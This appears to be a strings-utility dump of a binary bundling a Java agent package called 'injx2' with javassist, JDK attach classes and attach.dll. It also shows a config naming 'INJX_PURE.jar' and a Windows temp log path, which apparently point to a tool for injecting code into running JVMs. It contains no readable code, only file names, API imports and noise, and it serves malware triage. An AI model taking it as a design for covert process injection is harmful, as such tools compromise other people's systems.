%z\ux 00000003842E 00000003842E 0 1BaU8 0000000384E6 0000000384E6 0 -ZO]+ 0000000385B0 0000000385B0 0 Gnf0/ 0000000385D3 0000000385D3 0 &i wEyuf 0000000388B8 0000000388B8 0 []Zh- 000000038C1C 000000038C1C 0 sun/jvmstat/monitor/ByteArrayMonitor.classUT 000000038C50 000000038C50 0 %z\ux 000000038CB2 000000038CB2 0 ~VYnqIb 000000038CCB 000000038CCB 0 46ePYv 000000038D20 000000038D20 0 sun/jvmstat/monitor/AbstractMonitor.classUT 000000038D53 000000038D53 0 %z\ux 000000038E19 000000038E19 0 U;oX% 000000038FC1 000000038FC1 0 dz9t{ 000000039026 000000039026 0 sun/jvmstat/monitor/remote/BufferedMonitoredVm.classUT 000000039064 000000039064 0 %z\ux 0000000390E4 0000000390E4 0 Bg7[; File pos Mem pos ID Text ======== ======= == ==== 000000039115 000000039115 0 -e:]i 000000039144 000000039144 0 sun/jvmstat/perfdata/monitor/SyntaxException.classUT 000000039180 000000039180 0 %z\ux 0000000391B3 0000000391B3 0 :-+:+ 000000039206 000000039206 0 S7(b|4 00000003931C 00000003931C 0 sun/jvmstat/perfdata/monitor/PerfStringVariableMonitor.classUT 000000039362 000000039362 0 %z\ux 0000000394F7 0000000394F7 0 sun/jvmstat/perfdata/monitor/PerfStringMonitor.classUT 000000039535 000000039535 0 %z\ux 0000000396A6 0000000396A6 0 Im2,'[ 0000000397CF 0000000397CF 0 bNAnT:{ 0000000397E1 0000000397E1 0 sun/jvmstat/perfdata/monitor/PerfStringConstantMonitor.classUT 000000039827 000000039827 0 %z\ux 000000039896 000000039896 0 !SVZV| 0000000399AC 0000000399AC 0 zB9Fu 0000000399D2 0000000399D2 0 sun/jvmstat/perfdata/monitor/PerfLongMonitor.classUT 000000039A0E 000000039A0E 0 %z\ux 000000039B86 000000039B86 0 3t{kK_ 000000039BED 000000039BED 0 sun/jvmstat/perfdata/monitor/PerfIntegerMonitor.classUT 000000039C2C 000000039C2C 0 %z\ux 000000039CDB 000000039CDB 0 O8%SK 000000039DF8 000000039DF8 0 bNOwSG 000000039E0A 000000039E0A 0 sun/jvmstat/perfdata/monitor/PerfDataBufferImpl.classUT 000000039E49 000000039E49 0 %z\ux 000000039E5C 000000039E5C 0 X x\U 000000039F37 000000039F37 0 o*L[fYqkn 000000039FD9 000000039FD9 0 }FJ.6c)k 00000003A264 00000003A264 0 wnFNbI 00000003A271 00000003A271 0 "iZ 7k 00000003A309 00000003A309 0 :>,p$. 00000003A41A 00000003A41A 0 xHv=K 00000003A44D 00000003A44D 0 &9}}' 00000003A5D0 00000003A5D0 0 U<w-O 00000003A774 00000003A774 0 FlQ3q 00000003A7AA 00000003A7AA 0 70nk; 00000003A82A 00000003A82A 0 sun/jvmstat/perfdata/monitor/PerfByteArrayMonitor.classUT 00000003A86B 00000003A86B 0 %z\ux 00000003A90D 00000003A90D 0 vDl:& 00000003A977 00000003A977 0 &3(f0 00000003A990 00000003A990 0 L4ULW 00000003AA1E 00000003AA1E 0 Z,W66Kc 00000003AA9C 00000003AA9C 0 :;Hpy+x 00000003AAC9 00000003AAC9 0 sun/jvmstat/perfdata/monitor/MonitorVersionException.classUT 00000003AB0D 00000003AB0D 0 %z\ux 00000003AB64 00000003AB64 0 d8nwR 00000003ABB7 00000003ABB7 0 PoOVr+ 00000003AC2C 00000003AC2C 0 sun/jvmstat/perfdata/monitor/MonitorTypeException.classUT 00000003AC6D 00000003AC6D 0 %z\ux 00000003AC9F 00000003AC9F 0 @%%L;) 00000003AD2D 00000003AD2D 0 G8 Re 00000003AD4A 00000003AD4A 0 7248)' 00000003AD8A 00000003AD8A 0 sun/jvmstat/perfdata/monitor/MonitorStructureException.classUT 00000003ADD0 00000003ADD0 0 %z\ux 00000003AE05 00000003AE05 0 KJ7)iR|-O 00000003AE77 00000003AE77 0 6fH3d 00000003AEF1 00000003AEF1 0 sun/jvmstat/perfdata/monitor/MonitorDataException.classUT 00000003AF32 00000003AF32 0 %z\ux 00000003AF87 00000003AF87 0 Pg8J[# 00000003AFBE 00000003AFBE 0 {>n&j 00000003B00E 00000003B00E 0 w248)' File pos Mem pos ID Text ======== ======= == ==== 00000003B04E 00000003B04E 0 sun/jvmstat/perfdata/monitor/CountedTimerTask.classUT 00000003B08B 00000003B08B 0 %z\ux 00000003B1C4 00000003B1C4 0 sun/jvmstat/perfdata/monitor/AliasFileParser.classUT 00000003B200 00000003B200 0 %z\ux 00000003B243 00000003B243 0 wQPD@EP 00000003B306 00000003B306 0 jt)Cq 00000003B30C 00000003B30C 0 \yPUl 00000003B32A 00000003B32A 0 )EY % 00000003B37D 00000003B37D 0 !:MCU 00000003B386 00000003B386 0 9[Vm% 00000003B3D2 00000003B3D2 0 {aB1# 00000003B559 00000003B559 0 6ahCTB# 00000003B692 00000003B692 0 ly%;% 00000003B6A9 00000003B6A9 0 $Q &[ 00000003B738 00000003B738 0 ol[;+ 00000003B7EA 00000003B7EA 0 sun/jvmstat/perfdata/monitor/AliasFileParser$Token.classUT 00000003B82C 00000003B82C 0 %z\ux 00000003B8CB 00000003B8CB 0 x>QZhg* 00000003B92A 00000003B92A 0 L$@YX(F 00000003B9AC 00000003B9AC 0 sun/jvmstat/perfdata/monitor/AbstractPerfDataBufferPrologue.classUT 00000003B9F7 00000003B9F7 0 %z\ux 00000003BA1B 00000003BA1B 0 (P1M/ 00000003BA54 00000003BA54 0 8>3~g7 00000003BA92 00000003BA92 0 ptd&2: 00000003BC04 00000003BC04 0 ZP4}{ 00000003BE57 00000003BE57 0 Om)%tf 00000003BE8D 00000003BE8D 0 1,c'g 00000003BED6 00000003BED6 0 p/=Sv< 00000003BF7B 00000003BF7B 0 -Tfk7 00000003BFE3 00000003BFE3 0 sun/jvmstat/perfdata/monitor/AbstractPerfDataBuffer.classUT 00000003C026 00000003C026 0 %z\ux 00000003C082 00000003C082 0 8~p<7 00000003C0FC 00000003C0FC 0 [fQ@d 00000003C118 00000003C118 0 $~kJ7 00000003C124 00000003C124 0 :nPL9m 00000003C1F3 00000003C1F3 0 7jYGI 00000003C22E 00000003C22E 0 8:>Em 00000003C292 00000003C292 0 uw-m! 00000003C2B7 00000003C2B7 0 VDLD\ 00000003C2FD 00000003C2FD 0 5:i[g 00000003C44B 00000003C44B 0 ABzx4 00000003C4AF 00000003C4AF 0 @R /% 00000003C54F 00000003C54F 0 V!BcX) 00000003C565 00000003C565 0 Oh8?# 00000003C5BD 00000003C5BD 0 sun/jvmstat/perfdata/monitor/AbstractMonitoredVm.classUT 00000003C5FD 00000003C5FD 0 %z\ux 00000003C6C8 00000003C6C8 0 vnkYT 00000003C722 00000003C722 0 7dIqN 00000003C75F 00000003C75F 0 Sze[( 00000003C854 00000003C854 0 8L!0C 00000003C93D 00000003C93D 0 sun/jvmstat/perfdata/monitor/v2_0/TypeCode.classUT 00000003C977 00000003C977 0 %z\ux 00000003CA3E 00000003CA3E 0 WhI.U 00000003CC80 00000003CC80 0 EUM8C 00000003CC89 00000003CC89 0 nC8Y- 00000003CD3D 00000003CD3D 0 sun/jvmstat/perfdata/monitor/v2_0/PerfDataBufferPrologue.classUT 00000003CD85 00000003CD85 0 %z\ux 00000003CE3A 00000003CE3A 0 %}F,T 00000003CE8D 00000003CE8D 0 dXHUU} 00000003CE97 00000003CE97 0 ]$>[U File pos Mem pos ID Text ======== ======= == ==== 00000003D005 00000003D005 0 RV4Y7 00000003D0C2 00000003D0C2 0 RhFia 00000003D105 00000003D105 0 89xrQ;O# 00000003D353 00000003D353 0 l6j7p 00000003D37C 00000003D37C 0 sun/jvmstat/perfdata/monitor/protocol/local/PerfDataFile.classUT 00000003D3C4 00000003D3C4 0 %z\ux 00000003D4CF 00000003D4CF 0 4=yv_ 00000003D50B 00000003D50B 0 *UtL/e;~ 00000003D51D 00000003D51D 0 k3I1 00000003D60C 00000003D60C 0 jg/].S 00000003D79D 00000003D79D 0 6Di0T3U 00000003DA54 00000003DA54 0 sun/jvmstat/perfdata/monitor/protocol/local/PerfDataBuffer.classUT 00000003DA9E 00000003DA9E 0 %z\ux 00000003DBB9 00000003DBB9 0 XTLrU0 00000003DC41 00000003DC41 0 MU/MTU 00000003DCC6 00000003DCC6 0 n/O1hY 00000003DD85 00000003DD85 0 gf<&r 00000003DE65 00000003DE65 0 j0fw1 00000003DF6C 00000003DF6C 0 sun/jvmstat/perfdata/monitor/protocol/local/MonitoredHostProvider.classUT 00000003DFBD 00000003DFBD 0 %z\ux 00000003E11A 00000003E11A 0 HY4[;fXA 00000003E134 00000003E134 0 z&lLZ 00000003E19E 00000003E19E 0 =3>hP 00000003E3D7 00000003E3D7 0 -d3*5 00000003E3FE 00000003E3FE 0 JLC/F5l 00000003E40F 00000003E40F 0 HhhGR 00000003E681 00000003E681 0 FLP+C 00000003E6B8 00000003E6B8 0 -R)ZL 00000003E78F 00000003E78F 0 bN0e0 00000003E7A1 00000003E7A1 0 sun/jvmstat/perfdata/monitor/protocol/local/MonitoredHostProvider$NotifierTask.classUT 00000003E7FF 00000003E7FF 0 %z\ux 00000003E821 00000003E821 0 _(V,-e( 00000003E922 00000003E922 0 ekq+O 00000003E9A3 00000003E9A3 0 o[A u 00000003EA64 00000003EA64 0 +MV3Y. 00000003EB7F 00000003EB7F 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager.classUT 00000003EBC9 00000003EBC9 0 %z\ux 00000003EC6B 00000003EC6B 0 :u]5: 00000003ED3D 00000003ED3D 0 1:!GK[Z\ 00000003EDAB 00000003EDAB 0 :r~nr 00000003EDFF 00000003EDFF 0 >>6NVEmNbd 00000003EE5E 00000003EE5E 0 EnQB=vIX 00000003EF06 00000003EF06 0 6.A 7 00000003F0EC 00000003F0EC 0 $jEQj 00000003F12F 00000003F12F 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager$3.classUT 00000003F17B 00000003F17B 0 %z\ux 00000003F27B 00000003F27B 0 )Ou,R 00000003F2CB 00000003F2CB 0 ]!U,{ 00000003F386 00000003F386 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager$2.classUT 00000003F3D2 00000003F3D2 0 %z\ux 00000003F43B 00000003F43B 0 -Cm7Q 00000003F463 00000003F463 0 |UdCi 00000003F483 00000003F483 0 kSq$x 00000003F5DC 00000003F5DC 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager$1.classUT 00000003F628 00000003F628 0 %z\ux 00000003F678 00000003F678 0 }i-yn{ 00000003F68A 00000003F68A 0 f(5[{ 00000003F834 00000003F834 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalMonitoredVm.classUT 00000003F880 00000003F880 0 %z\ux 00000003F9DE 00000003F9DE 0 L5m$R File pos Mem pos ID Text ======== ======= == ==== 00000003FA0B 00000003FA0B 0 %)TKA 00000003FA4B 00000003FA4B 0 XBz-s 00000003FB78 00000003FB78 0 F1exQC 00000003FE93 00000003FE93 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalMonitoredVm$NotifierTask.classUT 00000003FEEC 00000003FEEC 0 %z\ux 00000004008C 00000004008C 0 4HxfA 000000040282 000000040282 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalEventTimer.classUT 0000000402CD 0000000402CD 0 %z\ux 000000040358 000000040358 0 XC-aw* 000000040432 000000040432 0 META-INF/UT 000000040441 000000040441 0 %z\ux 000000040481 000000040481 0 META-INF/MANIFEST.MFPK 0000000404C3 0000000404C3 0 conf/PK 0000000404F6 0000000404F6 0 dynamic/PK 00000004052C 00000004052C 0 injx2/UT 000000040537 000000040537 0 }#z\ux 000000040578 000000040578 0 injx2/Agent$KRunnable.classPK 0000000405C1 0000000405C1 0 injx2/Agent.classPK 000000040600 000000040600 0 injx2/Global.classPK 000000040640 000000040640 0 injx2/HTTPServ$MyHandler$dispen.classPK 000000040693 000000040693 0 injx2/HTTPServ$MyHandler.classPK 0000000406DF 0000000406DF 0 injx2/HTTPServ.classPK 000000040721 000000040721 0 injx2/INJX.classPK 00000004075F 00000004075F 0 injx2/ViewClassLoader.classPK 0000000407A8 0000000407A8 0 injx2/javassist/UT 0000000407BE 0000000407BE 0 #z\ux 0000000407FE 0000000407FE 0 injx2/javassist/bytecode/UT 00000004081D 00000004081D 0 #z\ux 00000004085D 00000004085D 0 com/UT 000000040867 000000040867 0 %z\ux 0000000408A7 0000000408A7 0 com/sun/UT 0000000408B5 0000000408B5 0 %z\ux 0000000408F5 0000000408F5 0 com/sun/tools/UT 000000040909 000000040909 0 %z\ux 000000040949 000000040949 0 com/sun/tools/attach/UT 000000040964 000000040964 0 %z\ux 0000000409A4 0000000409A4 0 com/sun/tools/attach/AttachPermission.classUT 000000040A15 000000040A15 0 com/sun/tools/attach/AttachNotSupportedException.classUT 000000040A91 000000040A91 0 com/sun/tools/attach/AgentLoadException.classUT 000000040B04 000000040B04 0 com/sun/tools/attach/AgentInitializationException.classUT 000000040B81 000000040B81 0 com/sun/tools/attach/spi/UT 000000040BA0 000000040BA0 0 %z\ux 000000040BE0 000000040BE0 0 sun/UT 000000040BEA 000000040BEA 0 %z\ux 000000040C2A 000000040C2A 0 sun/tools/UT 000000040C3A 000000040C3A 0 %z\ux 000000040C7A 000000040C7A 0 sun/jvmstat/UT 000000040C8C 000000040C8C 0 %z\ux 000000040CCC 000000040CCC 0 sun/tools/attach/UT 000000040CE3 000000040CE3 0 1z\ux 000000040D23 000000040D23 0 sun/tools/attach/WindowsVirtualMachine.classUT 000000040D95 000000040D95 0 sun/tools/attach/WindowsAttachProvider.classUT 000000040E07 000000040E07 0 sun/tools/attach/HotSpotVirtualMachine.classUT 000000040E79 000000040E79 0 sun/tools/attach/WindowsVirtualMachine$PipedInputStream.classUT 000000040EBC 000000040EBC 0 1z\ux 000000040EFC 000000040EFC 0 sun/jvmstat/monitor/UT 000000040F16 000000040F16 0 %z\ux 000000040F56 000000040F56 0 sun/jvmstat/perfdata/UT 000000040F71 000000040F71 0 %z\ux 000000040FB1 000000040FB1 0 sun/jvmstat/monitor/remote/UT File pos Mem pos ID Text ======== ======= == ==== 000000040FD2 000000040FD2 0 %z\ux 000000041012 000000041012 0 sun/jvmstat/perfdata/monitor/UT 000000041035 000000041035 0 %z\ux 000000041075 000000041075 0 sun/jvmstat/perfdata/monitor/protocol/UT 0000000410A1 0000000410A1 0 %z\ux 0000000410E1 0000000410E1 0 sun/jvmstat/perfdata/monitor/v2_0/UT 000000041109 000000041109 0 %z\ux 000000041149 000000041149 0 sun/jvmstat/perfdata/monitor/v2_0/PerfDataBuffer.classUT 0000000411C5 0000000411C5 0 sun/jvmstat/perfdata/monitor/protocol/local/UT 0000000411F7 0000000411F7 0 %z\ux 000000041237 000000041237 0 META-INF/services/UT 00000004124F 00000004124F 0 %z\ux 00000004128F 00000004128F 0 META-INF/services/com.sun.tools.attach.spi.AttachProviderUT 00000004130E 00000004130E 0 META-INF/services/com.sun.tools.internal.xjc.PluginUT 000000041387 000000041387 0 META-INF/services/com.sun.mirror.apt.AnnotationProcessorFactoryUT 0000000413EB 0000000413EB 0 rzB#n 00000004140C 00000004140C 0 META-INF/services/com.sun.jdi.connect.spi.TransportServiceUT 00000004148C 00000004148C 0 META-INF/services/com.sun.jdi.connect.ConnectorUT 000000041501 000000041501 0 injx2/javassist/NotFoundException.classUT 00000004152E 00000004152E 0 #z\ux 00000004154E 00000004154E 0 bNC7V7 00000004156E 00000004156E 0 injx2/javassist/JarClassPath.classUT 000000041596 000000041596 0 #z\ux 0000000415D6 0000000415D6 0 injx2/javassist/DirClassPath.classUT 0000000415FE 0000000415FE 0 #z\ux 00000004163E 00000004163E 0 injx2/javassist/CtPrimitiveType.classUT 000000041669 000000041669 0 #z\ux 0000000416A9 0000000416A9 0 injx2/javassist/CtMethod.classUT 0000000416CD 0000000416CD 0 #z\ux 00000004170D 00000004170D 0 injx2/javassist/CtMember$Cache.classUT 000000041737 000000041737 0 #z\ux 000000041777 000000041777 0 injx2/javassist/CtMember.classUT 00000004179B 00000004179B 0 #z\ux 0000000417DB 0000000417DB 0 injx2/javassist/CtField.classUT 0000000417FE 0000000417FE 0 #z\ux 00000004183E 00000004183E 0 injx2/javassist/CtConstructor.classUT 000000041867 000000041867 0 #z\ux 0000000418A7 0000000418A7 0 injx2/javassist/CtClassType.classUT 0000000418CE 0000000418CE 0 #z\ux 00000004190E 00000004190E 0 injx2/javassist/CtClass.classUT 000000041931 000000041931 0 #z\ux 000000041971 000000041971 0 injx2/javassist/CtBehavior.classUT 000000041997 000000041997 0 #z\ux 0000000419D7 0000000419D7 0 injx2/javassist/ClassPoolTail.classUT 000000041A00 000000041A00 0 #z\ux 000000041A40 000000041A40 0 injx2/javassist/ClassPool$1.classUT 000000041A67 000000041A67 0 #z\ux 000000041AA7 000000041AA7 0 injx2/javassist/ClassPool.classUT 000000041ACC 000000041ACC 0 #z\ux 000000041B0C 000000041B0C 0 injx2/javassist/ClassPathList.classUT 000000041B35 000000041B35 0 #z\ux 000000041B75 000000041B75 0 injx2/javassist/ClassPath.classUT 000000041B9A 000000041B9A 0 #z\ux 000000041BBA 000000041BBA 0 bN']6O 000000041BDA 000000041BDA 0 injx2/javassist/ClassClassPath.classUT 000000041C04 000000041C04 0 #z\ux 000000041C44 000000041C44 0 injx2/javassist/bytecode/Utf8Info.classUT 000000041C71 000000041C71 0 #z\ux 000000041CB1 000000041CB1 0 injx2/javassist/bytecode/StringInfo.classUT 000000041CE0 000000041CE0 0 #z\ux File pos Mem pos ID Text ======== ======= == ==== 000000041D20 000000041D20 0 injx2/javassist/bytecode/StackMapTable.classUT 000000041D52 000000041D52 0 #z\ux 000000041D92 000000041D92 0 injx2/javassist/bytecode/SourceFileAttribute.classUT 000000041DCA 000000041DCA 0 #z\ux 000000041E0A 000000041E0A 0 injx2/javassist/bytecode/Opcode.classUT 000000041E35 000000041E35 0 #z\ux 000000041E75 000000041E75 0 injx2/javassist/bytecode/NameAndTypeInfo.classUT 000000041EA9 000000041EA9 0 #z\ux 000000041EE9 000000041EE9 0 injx2/javassist/bytecode/MethodrefInfo.classUT 000000041F1B 000000041F1B 0 #z\ux 000000041F5B 000000041F5B 0 injx2/javassist/bytecode/MethodInfo.classUT 000000041F8A 000000041F8A 0 #z\ux 000000041FCA 000000041FCA 0 injx2/javassist/bytecode/MemberrefInfo.classUT 000000041FFC 000000041FFC 0 #z\ux 00000004203C 00000004203C 0 injx2/javassist/bytecode/LongVector.classUT 00000004206B 00000004206B 0 #z\ux 0000000420AB 0000000420AB 0 injx2/javassist/bytecode/LocalVariableAttribute.classUT 0000000420E6 0000000420E6 0 #z\ux 000000042126 000000042126 0 injx2/javassist/bytecode/LineNumberAttribute.classUT 00000004215E 00000004215E 0 #z\ux 00000004219E 00000004219E 0 injx2/javassist/bytecode/FieldrefInfo.classUT 0000000421CF 0000000421CF 0 #z\ux 00000004220F 00000004220F 0 injx2/javassist/bytecode/FieldInfo.classUT 00000004223D 00000004223D 0 #z\ux 00000004225D 00000004225D 0 bNB\eHm 00000004227D 00000004227D 0 injx2/javassist/bytecode/ExceptionTableEntry.classUT 0000000422B5 0000000422B5 0 #z\ux 0000000422F5 0000000422F5 0 injx2/javassist/bytecode/ExceptionTable.classUT 000000042328 000000042328 0 #z\ux 000000042368 000000042368 0 injx2/javassist/bytecode/ExceptionsAttribute.classUT 0000000423A0 0000000423A0 0 #z\ux 0000000423E0 0000000423E0 0 injx2/javassist/bytecode/Descriptor.classUT 00000004240F 00000004240F 0 #z\ux 00000004244F 00000004244F 0 injx2/javassist/bytecode/ConstPool.classUT 00000004247D 00000004247D 0 #z\ux 0000000424BD 0000000424BD 0 injx2/javassist/bytecode/ConstInfo.classUT 0000000424EB 0000000424EB 0 #z\ux 00000004252B 00000004252B 0 injx2/javassist/bytecode/CodeAttribute.classUT 00000004255D 00000004255D 0 #z\ux 00000004259D 00000004259D 0 injx2/javassist/bytecode/ClassInfo.classUT 0000000425CB 0000000425CB 0 #z\ux 00000004260B 00000004260B 0 injx2/javassist/bytecode/ClassFile.classUT 000000042639 000000042639 0 #z\ux 000000042679 000000042679 0 injx2/javassist/bytecode/AttributeInfo.classUT 0000000426AB 0000000426AB 0 #z\ux 0000000426EB 0000000426EB 0 com/sun/tools/attach/VirtualMachineDescriptor.classUT 000000042744 000000042744 0 bNw7j 000000042764 000000042764 0 com/sun/tools/attach/VirtualMachine.classUT 0000000427D3 0000000427D3 0 com/sun/tools/attach/spi/AttachProvider.classUT 000000042846 000000042846 0 sun/tools/attach/HotSpotAttachProvider.classUT 0000000428B8 0000000428B8 0 sun/tools/attach/HotSpotAttachProvider$HotSpotVirtualMachineDescriptor.classUT 00000004294A 00000004294A 0 sun/jvmstat/monitor/VmIdentifier.classUT 0000000429B6 0000000429B6 0 sun/jvmstat/monitor/StringMonitor.classUT 000000042A23 000000042A23 0 sun/jvmstat/monitor/MonitorException.classUT 000000042A93 000000042A93 0 sun/jvmstat/monitor/MonitoredVmUtil.classUT 000000042AE2 000000042AE2 0 bNm98Lm 000000042B02 000000042B02 0 sun/jvmstat/monitor/MonitoredVm.classUT 000000042B6D 000000042B6D 0 sun/jvmstat/monitor/MonitoredHost.classUT 000000042BDA 000000042BDA 0 sun/jvmstat/monitor/Monitor.classUT 000000042C41 000000042C41 0 sun/jvmstat/monitor/LongMonitor.classUT File pos Mem pos ID Text ======== ======= == ==== 000000042CAC 000000042CAC 0 sun/jvmstat/monitor/IntegerMonitor.classUT 000000042D1A 000000042D1A 0 sun/jvmstat/monitor/HostIdentifier.classUT 000000042D88 000000042D88 0 sun/jvmstat/monitor/ByteArrayMonitor.classUT 000000042DF8 000000042DF8 0 sun/jvmstat/monitor/AbstractMonitor.classUT 000000042E67 000000042E67 0 sun/jvmstat/monitor/remote/BufferedMonitoredVm.classUT 000000042EE1 000000042EE1 0 sun/jvmstat/perfdata/monitor/SyntaxException.classUT 000000042F59 000000042F59 0 sun/jvmstat/perfdata/monitor/PerfStringVariableMonitor.classUT 000000042FDB 000000042FDB 0 sun/jvmstat/perfdata/monitor/PerfStringMonitor.classUT 000000043035 000000043035 0 bNAnT:{ 000000043055 000000043055 0 sun/jvmstat/perfdata/monitor/PerfStringConstantMonitor.classUT 0000000430D7 0000000430D7 0 sun/jvmstat/perfdata/monitor/PerfLongMonitor.classUT 00000004314F 00000004314F 0 sun/jvmstat/perfdata/monitor/PerfIntegerMonitor.classUT 0000000431AA 0000000431AA 0 bNOwSG 0000000431CA 0000000431CA 0 sun/jvmstat/perfdata/monitor/PerfDataBufferImpl.classUT 000000043245 000000043245 0 sun/jvmstat/perfdata/monitor/PerfByteArrayMonitor.classUT 0000000432C2 0000000432C2 0 sun/jvmstat/perfdata/monitor/MonitorVersionException.classUT 000000043342 000000043342 0 sun/jvmstat/perfdata/monitor/MonitorTypeException.classUT 0000000433BF 0000000433BF 0 sun/jvmstat/perfdata/monitor/MonitorStructureException.classUT 000000043441 000000043441 0 sun/jvmstat/perfdata/monitor/MonitorDataException.classUT 0000000434BE 0000000434BE 0 sun/jvmstat/perfdata/monitor/CountedTimerTask.classUT 000000043537 000000043537 0 sun/jvmstat/perfdata/monitor/AliasFileParser.classUT 0000000435AF 0000000435AF 0 sun/jvmstat/perfdata/monitor/AliasFileParser$Token.classUT 00000004362D 00000004362D 0 sun/jvmstat/perfdata/monitor/AbstractPerfDataBufferPrologue.classUT 0000000436B4 0000000436B4 0 sun/jvmstat/perfdata/monitor/AbstractPerfDataBuffer.classUT 000000043733 000000043733 0 sun/jvmstat/perfdata/monitor/AbstractMonitoredVm.classUT 0000000437AF 0000000437AF 0 sun/jvmstat/perfdata/monitor/v2_0/TypeCode.classUT 000000043825 000000043825 0 sun/jvmstat/perfdata/monitor/v2_0/PerfDataBufferPrologue.classUT 0000000438A9 0000000438A9 0 sun/jvmstat/perfdata/monitor/protocol/local/PerfDataFile.classUT 00000004392D 00000004392D 0 sun/jvmstat/perfdata/monitor/protocol/local/PerfDataBuffer.classUT 0000000439B3 0000000439B3 0 sun/jvmstat/perfdata/monitor/protocol/local/MonitoredHostProvider.classUT 000000043A20 000000043A20 0 bN0e0 000000043A40 000000043A40 0 sun/jvmstat/perfdata/monitor/protocol/local/MonitoredHostProvider$NotifierTask.classUT 000000043ADA 000000043ADA 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager.classUT 000000043B60 000000043B60 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager$3.classUT 000000043BE8 000000043BE8 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager$2.classUT 000000043C70 000000043C70 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalVmManager$1.classUT 000000043CF8 000000043CF8 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalMonitoredVm.classUT 000000043D80 000000043D80 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalMonitoredVm$NotifierTask.classUT 000000043E15 000000043E15 0 sun/jvmstat/perfdata/monitor/protocol/local/LocalEventTimer.classUT 000000002322 000000002322 0 VS_VERSION_INFO 00000000237E 00000000237E 0 StringFileInfo 0000000023A2 0000000023A2 0 000004b0 0000000023BA 0000000023BA 0 CompanyName 0000000023D4 0000000023D4 0 Sun Microsystems, Inc. 00000000240A 00000000240A 0 FileDescription 00000000242C 00000000242C 0 Java(TM) Platform SE binary 00000000246A 00000000246A 0 FileVersion 000000002484 000000002484 0 6.0.450.6 00000000249E 00000000249E 0 Full Version 0000000024B8 0000000024B8 0 1.6.0_45-b06 0000000024DA 0000000024DA 0 InternalName 0000000024F4 0000000024F4 0 attach 00000000250A 00000000250A 0 LegalCopyright 00000000253E 00000000253E 0 2013 000000002552 000000002552 0 OriginalFilename 000000002574 000000002574 0 attach.dll 000000002592 000000002592 0 ProductName 0000000025AC 0000000025AC 0 Java(TM) Platform SE 6 U45 0000000025EA 0000000025EA 0 ProductVersion 000000002608 000000002608 0 6.0.450.6 File pos Mem pos ID Text ======== ======= == ==== 000000002622 000000002622 0 VarFileInfo 000000002642 000000002642 0 Translation 00000000AF5B 00000000AF5B 0 Td\g[i]f 00000000B0F1 00000000B0F1 0 naoeqf 00000000003C 00000000003C 0 1.txt 000000000052 000000000052 0 attach.dll 00000000006D 00000000006D 0 INJX_PURE.jar 000000000083 000000000083 0 counter=0 00000000008D 00000000008D 0 logoutput=C:\\windows\\temp\\daemon 0000000000B1 0000000000B1 0 verbose=0 000000000109 000000000109 0 !This program cannot be run in DOS mode. 000000000193 000000000193 0 jRich 0000000002A4 0000000002A4 0 .text 0000000002CC 0000000002CC 0 .rdata 0000000002F3 0000000002F3 0 @.data 00000000031C 00000000031C 0 .rsrc 000000000343 000000000343 0 @.reloc 000000000562 000000000562 0 PSSSV 000000000D76 000000000D76 0 u$VWW 000000001398 000000001398 0 Unable to initialize process status helper library 0000000013CC 0000000013CC 0 GetModuleBaseNameA 0000000013E0 0000000013E0 0 EnumProcessModules 0000000013F4 0000000013F4 0 EnumProcesses 000000001404 000000001404 0 PSAPI.DLL 000000001410 000000001410 0 Unable to get address of GetModuleHandle or GetProcAddress 00000000144C 00000000144C 0 IsWow64Process 00000000145C 00000000145C 0 GetProcAddress 00000000146C 00000000146C 0 GetModuleHandleA 000000001480 000000001480 0 kernel32 00000000148C 00000000148C 0 ConnectNamedPipe failed 0000000014A4 0000000014A4 0 ReadFile 0000000014B0 0000000014B0 0 SeDebugPrivilege 0000000014C4 0000000014C4 0 com/sun/tools/attach/AttachNotSupportedException 0000000014F8 0000000014F8 0 Unable to attach to 64-bit process 00000000151C 00000000151C 0 OpenProcess failed 000000001530 000000001530 0 no such process 000000001540 000000001540 0 CreateNamedPipe failed 000000001558 000000001558 0 CreateRemoteThread failed 000000001574 000000001574 0 Insufficient memory or insufficient privileges to attach 0000000015B0 0000000015B0 0 jvm.dll not loaded by target process 0000000015DC 0000000015DC 0 Unable to enqueue operation: the target VM does not support attach mechanism 00000000162C 00000000162C 0 Remote thread failed for unknown reason 000000001654 000000001654 0 WaitForSingleObject failed 000000001670 000000001670 0 VirtualAllocEx failed 000000001688 000000001688 0 Too many arguments 00000000169C 00000000169C 0 _JVM_EnqueueOperation@20 0000000016B8 0000000016B8 0 JVM_EnqueueOperation 000000001764 000000001764 0 C:\BUILD_~1\jdk6_45\control\build\WINDOW~1\tmp\sun\com.sun.tools.attach\attach\obj\attach.pdb 000000001906 000000001906 0 _JNU_NewStringPlatform@8 000000001922 000000001922 0 _JNU_ReleaseStringPlatformChars@12 000000001948 000000001948 0 _JNU_GetStringPlatformChars@12 00000000196A 00000000196A 0 _JNU_ThrowInternalError@8 000000001986 000000001986 0 JDK_LoadSystemLibrary 00000000199E 00000000199E 0 _JNU_ThrowIOExceptionWithLastError@8 0000000019C6 0000000019C6 0 _JNU_ThrowByName@12 0000000019DC 0000000019DC 0 _JNU_ThrowIOException@8 0000000019F4 0000000019F4 0 java.dll 000000001A00 000000001A00 0 AdjustTokenPrivileges 000000001A18 000000001A18 0 LookupPrivilegeValueA 000000001A30 000000001A30 0 ImpersonateSelf File pos Mem pos ID Text ======== ======= == ==== 000000001A42 000000001A42 0 OpenThreadToken 000000001A52 000000001A52 0 ADVAPI32.dll 000000001A6A 000000001A6A 0 malloc 000000001A74 000000001A74 0 strcmp 000000001A7E 000000001A7E 0 memset 000000001A88 000000001A88 0 strncpy 000000001A92 000000001A92 0 strcpy 000000001A9A 000000001A9A 0 MSVCR71.dll 000000001AA8 000000001AA8 0 _initterm 000000001AB4 000000001AB4 0 _adjust_fdiv 000000001AC4 000000001AC4 0 __CppXcptFilter 000000001AD6 000000001AD6 0 _except_handler3 000000001AEA 000000001AEA 0 __dllonexit 000000001AF8 000000001AF8 0 _onexit 000000001B02 000000001B02 0 GetTempPathA 